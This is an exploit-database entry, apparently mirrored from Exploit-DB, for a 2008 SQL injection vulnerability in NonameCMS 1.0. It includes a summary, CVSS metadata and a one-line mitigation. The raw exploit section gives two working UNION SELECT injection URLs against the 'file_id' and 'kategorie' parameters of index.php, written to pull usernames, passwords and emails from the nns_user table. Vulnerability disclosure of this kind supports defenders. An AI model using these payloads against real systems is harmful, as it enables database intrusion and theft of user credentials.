header-logo
Suggest Exploit
vendor:
NonameCMS
by:
~!Dok_tOR!~
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: NonameCMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:noname-cms:nonamecms:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

NonameCMS SQL Injection Vulnerability

NonameCMS is vulnerable to SQL injection. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file_id' and 'kategorie' parameters of 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information, modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

To mitigate this vulnerability, user input should be properly sanitized and filtered.
Source

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: NonameCMS
Version: 1.0
URL: noname-cms.org
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/index.php?action=detailansicht&file_id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,benutzername,passwort,email),8+from+nns_user/*

Exploit 2:

http://localhost/[installdir]/index.php?action=kategorien&kategorie=-1'+union+select+1,2,user(),concat_ws(0x3a,benutzername,passwort,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+nns_user/*

# milw0rm.com [2008-10-01]

Navigation

Suggest Exploit

Services By CQR